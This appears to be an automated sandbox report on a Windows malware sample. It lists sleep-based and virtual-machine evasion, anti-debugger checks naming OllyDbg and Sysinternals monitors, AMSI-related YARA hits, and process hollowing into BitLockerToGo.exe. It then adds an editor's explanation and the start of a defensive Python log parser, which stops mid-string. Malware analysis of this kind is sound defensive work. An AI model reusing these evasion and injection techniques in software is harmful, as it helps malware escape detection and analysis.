Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE TID: 8016 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7948 Thread sleep count: 4087 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7980 Thread sleep count: 590 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3704 Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2536 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1888 Thread sleep count: 4019 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2792 Thread sleep count: 167 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7860 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3796 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 412 Thread sleep count: 3276 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6112 Thread sleep count: 466 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1988 Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2176 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7740 Thread sleep time: -15679732462653109s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2124 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3096 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3020 Thread sleep count: 3795 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3320 Thread sleep count: 520 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7108 Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7108 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7120 Thread sleep count: 5222 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6192 Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7096 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7148 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe TID: 7024 Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE TID: 6120 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7532 Thread sleep count: 4144 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7404 Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7556 Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe Code function: 8_2_00F7DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, 8_2_00F7DBBE
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe Code function: 8_2_00F868EE FindFirstFileW,FindClose, 8_2_00F868EE
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe Code function: 8_2_00F8698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, 8_2_00F8698F
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe Code function: 8_2_00F7D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 8_2_00F7D076
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe Code function: 8_2_00F7D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 8_2_00F7D3A9
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe Code function: 8_2_00F89642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 8_2_00F89642
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe Code function: 8_2_00F8979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 8_2_00F8979D
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe Code function: 8_2_00F89B2B FindFirstFileW,Sleep,FindNextFileW,FindClose, 8_2_00F89B2B
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe Code function: 8_2_00F85C97 FindFirstFileW,FindNextFileW,FindClose, 8_2_00F85C97
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe Code function: 30_2_00406301 FindFirstFileW,FindClose, 30_2_00406301
Source: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe Code function: 30_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW, 30_2_00406CC7
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe Code function: 8_2_00F142DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 8_2_00F142DE
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 30000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe Thread delayed: delay time: 60000
Source: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: skotes.exe, skotes.exe, 00000006.00000002.2981360890.0000000000AD7000.00000040.00000001.01000000.00000007.sdmp, TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE, TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE, 00000017.00000002.2447754863.000000000082D000.00000040.00000001.01000000.00000011.sdmp, 483d2fa8a0d53818306efeb32d3.exe, 0000002E.00000002.2476445885.0000000000709000.00000040.00000001.01000000.00000015.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: powershell.exe, 00000010.00000002.3251913835.0000024E79E7C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll(-
Source: powershell.exe, 0000000D.00000002.2318906148.0000000007664000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y"|
Source: powershell.exe, 00000024.00000002.2470935295.0000000007300000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\5
Source: skotes.exe, 00000006.00000002.2988300035.0000000001347000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWw
Source: mshta.exe, 0000000F.00000003.2286431742.0000020E49699000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}\^
Source: powershell.exe, 00000024.00000002.2470935295.0000000007300000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: mshta.exe, 0000000A.00000003.2263100502.0000000003238000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}s~e
Source: mshta.exe, 00000032.00000003.2423868229.00000000027AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}77#G
Source: k6Sly2p.exe, 00000007.00000002.2464434325.0000000002911000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware|VIRTUAL|A M I|Xen
Source: mshta.exe, 00000022.00000002.2374702831.00000000032F7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}I0*A
Source: skotes.exe, 00000006.00000002.2988300035.0000000001347000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.2988300035.0000000001308000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: mshta.exe, 0000000A.00000003.2263100502.0000000003238000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\[AM
Source: powershell.exe, 0000000D.00000002.2318906148.0000000007664000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: mshta.exe, 00000032.00000003.2423868229.00000000027AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\P7
Source: k6Sly2p.exe, 00000007.00000002.2464434325.0000000002911000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Microsoft|VMWare|Virtual
Source: powershell.exe, 00000024.00000002.2497298201.0000000008620000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
Source: mshta.exe, 0000000F.00000003.2286431742.0000020E49699000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\+
Source: DhqvS8pXj8.exe, 00000000.00000002.1715108275.00000000004B7000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000001.00000002.1733086772.0000000000AD7000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000002.00000002.1741388551.0000000000AD7000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000006.00000002.2981360890.0000000000AD7000.00000040.00000001.01000000.00000007.sdmp, TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE, 00000017.00000002.2447754863.000000000082D000.00000040.00000001.01000000.00000011.sdmp, 483d2fa8a0d53818306efeb32d3.exe, 0000002E.00000002.2476445885.0000000000709000.00000040.00000001.01000000.00000015.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: powershell.exe, 0000000D.00000002.2319375250.00000000076B0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2408210449.0000000000AE4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: powershell.exe, 00000034.00000002.2550594395.0000000007940000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll00Y
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe System information queried: ModuleInformation
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\DhqvS8pXj8.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE File opened: NTICE
Source: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE File opened: SICE
Source: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE File opened: SIWVID
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE Process queried: DebugPort
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE Process queried: DebugPort
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE Process queried: DebugPort
Source: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE Process queried: DebugPort
Source: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe Code function: 0_2_05100BE7 rdtsc 0_2_05100BE7
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe Code function: 8_2_00F8EAA2 BlockInput, 8_2_00F8EAA2
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe Code function: 8_2_00F42622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 8_2_00F42622
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe Code function: 8_2_00F142DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 8_2_00F142DE
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_0091652B mov eax, dword ptr fs:[00000030h] 6_2_0091652B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 6_2_0091A302 mov eax, dword ptr fs:[00000030h] 6_2_0091A302
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe Code function: 8_2_00F34CE8 mov eax, dword ptr fs:[00000030h] 8_2_00F34CE8
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe Code function: 8_2_00F70B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 8_2_00F70B62
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe Code function: 8_2_00F42622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 8_2_00F42622
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe Code function: 8_2_00F3083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 8_2_00F3083F
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe Code function: 8_2_00F309D5 SetUnhandledExceptionFilter, 8_2_00F309D5
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe Code function: 8_2_00F30C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 8_2_00F30C21
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: Yara match File source: amsi32_7396.amsi.csv, type: OTHER
Source: Yara match File source: amsi64_7664.amsi.csv, type: OTHER
Source: Yara match File source: amsi32_516.amsi.csv, type: OTHER
Source: Yara match File source: amsi64_5100.amsi.csv, type: OTHER
Source: Yara match File source: amsi32_6752.amsi.csv, type: OTHER
Source: Yara match File source: Process Memory Space: mshta.exe PID: 7204, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 7396, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: mshta.exe PID: 7604, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 7664, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: mshta.exe PID: 3900, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: mshta.exe PID: 5440, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 516, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 5100, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: mshta.exe PID: 6416, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 6752, type: MEMORYSTR
Source: C:\Users\user\AppData\Local\Temp\1075510001\c1336f9f75.exe Memory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\1075510001\c1336f9f75.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe Memory written: C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\1075510001\c1336f9f75.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 31BE008
Source: C:\Users\user\AppData\Local\Temp\1075510001\c1336f9f75.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\1075510001\c1336f9f75.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 401000
Source: C:\Users\user\AppData\Local\Temp\1075510001\c1336f9f75.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 445000
Source: C:\Users\user\AppData\Local\Temp\1075510001\c1336f9f75.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 447000
Source: C:\Users\user\AppData\Local\Temp\1075510001\c1336f9f75.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 455000
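The memory operations above have the classic shape of process hollowing: c1336f9f75.exe allocates an execute/read/write region at 0x400000 (the default 32-bit image base) inside BitLockerToGo.exe, a legitimate Windows binary, writes a buffer that begins with 4D5A ("MZ"), then fills further regions of the new image. 1e8dfbd5c2.exe writes an MZ header into a process that carries its own image path (it spawns copies of itself, as the process-creation lines below show), which a rule that only fires when the writer and target paths differ would miss. The following Python is an example added by the editor, not code from the Joe Sandbox report or from the sample: it parses the report's "Memory allocated"/"Memory written" line format and reduces the lines to one finding per writer/target pair. The sample input is copied verbatim from this report; the Finding type and the field names are the editor's own.

```python
import re
from dataclasses import dataclass

# Constructed input: the "Memory allocated"/"Memory written" lines of this report, verbatim.
REPORT_LINES = r"""
Source: C:\Users\user\AppData\Local\Temp\1075510001\c1336f9f75.exe Memory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\1075510001\c1336f9f75.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe Memory written: C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\1075510001\c1336f9f75.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 31BE008
Source: C:\Users\user\AppData\Local\Temp\1075510001\c1336f9f75.exe Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000
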